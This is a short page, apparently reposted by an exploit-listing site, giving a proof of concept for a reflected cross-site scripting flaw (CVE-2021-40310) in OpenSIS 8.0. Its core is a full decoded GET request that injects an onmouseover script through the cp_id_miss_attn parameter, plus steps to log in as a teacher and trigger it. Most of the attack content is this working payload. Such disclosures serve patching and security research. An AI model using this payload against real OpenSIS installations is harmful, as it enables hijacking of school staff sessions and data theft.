Edit Report

Our sensors found this exploit at:

Below is a copy:

OpenSIS 8.0 Cross Site Scripting
# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Date: 9/24/2021
# Exploit Author: Eric Salario
# Vendor Homepage:
# Software Link:
# Version: 8.0
# Tested on: Windows, Linux
# CVE : CVE-2021-40310

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.

1. Login as "teacher".

2. Navigate to (take attendance):

Decoded request:

GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

3. XSS triggers

PoC Video:

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.